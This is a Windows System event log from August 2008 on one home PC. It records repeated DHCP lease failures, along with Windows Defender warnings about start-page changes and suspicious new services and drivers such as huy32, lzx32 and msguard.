System - Error - 8/21/2008 7:10:25 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/21/2008 8:38:31 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/21/2008 8:38:31 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/21/2008 8:38:36 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/21/2008 8:38:36 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/21/2008 9:20:46 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = PlugPlayManager -> Description = Timed out sending notification of device interface change to window of IWMSWindow
System - Warning - 8/21/2008 9:20:52 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/21/2008 9:20:52 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/21/2008 10:31:59 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/21/2008 10:31:59 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Error - 8/21/2008 10:32:01 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not assigned an address from the network (by the DHCPServer) for the Network Card with network address 0018DE3CF436  The following erroroccurred 1223Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Warning - 8/21/2008 2:01:40 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = PlugPlayManager -> Description = Timed out sending notification of device interface change to window of IWMSWindow
System - Warning - 8/21/2008 2:01:40 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = PlugPlayManager -> Description = Timed out sending notification of device interface change to window of IWMSWindow
System - Warning - 8/21/2008 2:01:45 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/21/2008 2:01:45 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Error - 8/21/2008 2:01:48 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Server -> Description = The server could not bind to the transport DeviceNetbiosSmb because another computer on the network has the same name  The server could not start
System - Warning - 8/21/2008 3:14:29 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/21/2008 3:14:29 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/21/2008 3:14:33 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/21/2008 3:14:33 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/21/2008 4:13:21 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/21/2008 4:13:21 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/21/2008 6:43:16 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/21/2008 6:43:16 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/21/2008 8:08:01 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/21/2008 8:08:01 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/21/2008 8:08:06 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/21/2008 8:08:06 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/21/2008 9:16:37 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Win32k -> Description = 
System - Warning - 8/22/2008 6:54:48 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID AAD63037-EED3-4715-9159-5C3C44665DEDUser DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found iemainHKCUS-1-5-21-3016711891-1204557993-285463850-1006SOFTWAREMicrosoftInternet ExplorerMainStart PageAlert Type 807Detection Type (null)
System - Warning - 8/22/2008 6:54:50 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID 5A022868-4937-4E3C-AB1B-4B7DC72779C4User DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found iemainHKCUS-1-5-21-3016711891-1204557993-285463850-1006SOFTWAREMicrosoftInternet ExplorerMainStart PageAlert Type 807Detection Type (null)
System - Warning - 8/22/2008 6:54:52 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID AF712554-DCC4-4DF2-96CC-25E92A79014BUser DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found iemainHKCUS-1-5-21-3016711891-1204557993-285463850-1006SOFTWAREMicrosoftInternet ExplorerMainStart PageAlert Type 807Detection Type (null)
System - Warning - 8/22/2008 6:54:54 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID 914C2251-B8E2-4445-8B5D-A502C9F406A9User DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found iemainHKCUS-1-5-21-3016711891-1204557993-285463850-1006SOFTWAREMicrosoftInternet ExplorerMainStart PageAlert Type 807Detection Type (null)
System - Warning - 8/22/2008 6:54:59 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID 5395A989-6BF7-464C-AEC6-FEFAEA343682User DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found iemainHKCUS-1-5-21-3016711891-1204557993-285463850-1006SOFTWAREMicrosoftInternet ExplorerMainStart PageAlert Type 807Detection Type (null)
System - Warning - 8/22/2008 6:55:02 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID CA33CE45-6129-41E3-8FAB-29754C319700User DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found iemainHKCUS-1-5-21-3016711891-1204557993-285463850-1006SOFTWAREMicrosoftInternet ExplorerMainStart PageAlert Type 807Detection Type (null)
System - Warning - 8/22/2008 6:55:17 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID 760CAB70-76AD-4CD1-BE94-5161AC072708User DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found iemainHKCUS-1-5-21-3016711891-1204557993-285463850-1006SOFTWAREMicrosoftInternet ExplorerMainStart PageAlert Type 807Detection Type (null)
System - Warning - 8/22/2008 6:55:19 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID 9286C281-F765-4EB6-8B28-A5E14A5ED117User DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found iemainHKCUS-1-5-21-3016711891-1204557993-285463850-1006SOFTWAREMicrosoftInternet ExplorerMainStart PageAlert Type 807Detection Type (null)
System - Warning - 8/22/2008 6:56:04 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID 888BC797-E19B-49FD-B145-08AF95CB50D3User DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found iemainHKCUS-1-5-21-3016711891-1204557993-285463850-1006SOFTWAREMicrosoftInternet ExplorerMainStart PageAlert Type 807Detection Type (null)
System - Warning - 8/22/2008 6:56:05 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID 459204A0-5746-4E0C-B2FE-75A7F05F8F9BUser DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found iemainHKCUS-1-5-21-3016711891-1204557993-285463850-1006SOFTWAREMicrosoftInternet ExplorerMainStart PageAlert Type 807Detection Type (null)
System - Warning - 8/22/2008 6:56:22 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID A0B9877A-73CF-45F0-B35F-269E345E8BCCUser DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found iemainHKCUS-1-5-21-3016711891-1204557993-285463850-1006SOFTWAREMicrosoftInternet ExplorerMainStart PageAlert Type 807Detection Type (null)
System - Warning - 8/22/2008 6:56:26 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID 726EBF7B-A88D-4943-95C5-CB8F1C2A7BF6User DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found iemainHKCUS-1-5-21-3016711891-1204557993-285463850-1006SOFTWAREMicrosoftInternet ExplorerMainStart PageAlert Type 807Detection Type (null)
System - Error - 8/22/2008 7:51:54 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not assigned an address from the network (by the DHCPServer) for the Network Card with network address 0018DE3CF436  The following erroroccurred 1223Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Warning - 8/22/2008 7:51:57 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/22/2008 7:51:57 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/22/2008 7:53:33 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID 2DA4BF45-3917-4D0A-8E3F-5A41A28F1992User DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found driverxpdxAlert Type 807Detection Type (null)
System - Warning - 8/22/2008 7:53:33 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID 59A01311-8485-403C-9DA4-13EC7927EAB0User DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found servicexpdxAlert Type 807Detection Type (null)
System - Warning - 8/22/2008 7:53:33 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID 8FE964CC-E649-44C7-BB05-C40248B1EE30User DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found driverxpdtAlert Type 807Detection Type (null)
System - Warning - 8/22/2008 7:53:33 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID 42ACCFBE-D615-408C-A969-3E3717CFF92EUser DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found servicexpdtAlert Type 807Detection Type (null)
System - Warning - 8/22/2008 7:53:33 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID 709BD9C7-D784-4262-9580-C57616D2042BUser DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found servicehuy32Alert Type 807Detection Type (null)
System - Warning - 8/22/2008 7:53:33 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID AC9789B6-29D0-4128-B850-FE64B80DDD6BUser DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found driverhuy32Alert Type 807Detection Type (null)
System - Warning - 8/22/2008 7:53:33 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID 27781150-FF3A-4B52-9323-1639B0D40091User DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found servicepe386Alert Type 807Detection Type (null)
System - Warning - 8/22/2008 7:53:35 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID D5139405-217E-4EE7-9387-9DA394BBC469User DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found driverpe386Alert Type 807Detection Type (null)
System - Warning - 8/22/2008 7:53:35 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID CBB1AC23-C3FD-40DD-924C-53B8EAFBA132User DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found servicelzx32Alert Type 807Detection Type (null)
System - Warning - 8/22/2008 7:53:35 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID 48A70AD0-4B5D-467F-AC89-61FD362EDF8BUser DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found servicemsguardAlert Type 807Detection Type (null)
System - Warning - 8/22/2008 7:53:35 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID 20615F85-CFBB-4D9C-BE6A-29F81129B985User DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found driverlzx32Alert Type 807Detection Type (null)
System - Warning - 8/22/2008 7:53:36 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID B46E65F7-ACFC-446D-9A53-FB00C3200375User DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found drivermsguardAlert Type 807Detection Type (null)
System - Error - 8/22/2008 7:55:58 PM -> Computer Name = DJDKK5C1 - User Name = NT AUTHORITY\SYSTEM - Source = DCOM -> Description = 
System - Error - 8/22/2008 7:57:03 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Service Control Manager -> Description = The following boot-start or system-start driver(s) failed to load Aavmker4APPDRVaswSPFipsintelppm
System - Error - 8/22/2008 7:58:56 PM -> Computer Name = DJDKK5C1 - User Name = NT AUTHORITY\SYSTEM - Source = DCOM -> Description = 
System - Warning - 8/22/2008 8:00:18 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID A55D3AD0-9886-4619-B0AB-BDED52751673User DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found iemainHKCUS-1-5-21-3016711891-1204557993-285463850-1006SOFTWAREMicrosoftInternet ExplorerMainStart PageAlert Type 807Detection Type (null)
System - Warning - 8/22/2008 8:02:07 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID 5387C8C4-E0B5-46B9-B147-FCFCB2D7338FUser DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found iemainHKCUS-1-5-21-3016711891-1204557993-285463850-1006SOFTWAREMicrosoftInternet ExplorerMainStart PageAlert Type 807Detection Type (null)
System - Warning - 8/22/2008 8:02:07 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID 5263CD78-C674-4A6F-9FE5-2CA7F3B74A4EUser DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found iemainHKCUS-1-5-21-3016711891-1204557993-285463850-1006SOFTWAREMicrosoftInternet ExplorerMainStart PageAlert Type 807Detection Type (null)
System - Warning - 8/22/2008 8:04:31 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID 984407D9-FF2F-4CA6-9EF9-E6D0893AD1B4User DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found iemainHKCUS-1-5-21-3016711891-1204557993-285463850-1006SOFTWAREMicrosoftInternet ExplorerMainStart PageAlert Type 807Detection Type (null)
System - Warning - 8/22/2008 8:04:34 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID 9C62AB9E-383B-4404-9221-081E7BC768CDUser DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found iemainHKCUS-1-5-21-3016711891-1204557993-285463850-1006SOFTWAREMicrosoftInternet ExplorerMainStart PageAlert Type 807Detection Type (null)
System - Warning - 8/22/2008 10:04:10 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/22/2008 10:04:11 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/22/2008 10:04:16 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/22/2008 10:04:16 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/23/2008 12:25:26 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = PlugPlayManager -> Description = Timed out sending notification of device interface change to window of IWMSWindow
System - Warning - 8/23/2008 12:25:34 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/23/2008 12:25:34 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/23/2008 12:25:37 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Server -> Description = The server could not bind to the transport DeviceNetBTTcpipB2894969-D901-400B-BEAC-4704968BED16
System - Error - 8/23/2008 12:26:02 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Service Control Manager -> Description = Timeout (30000 milliseconds) waiting for a transaction response from the stisvc service
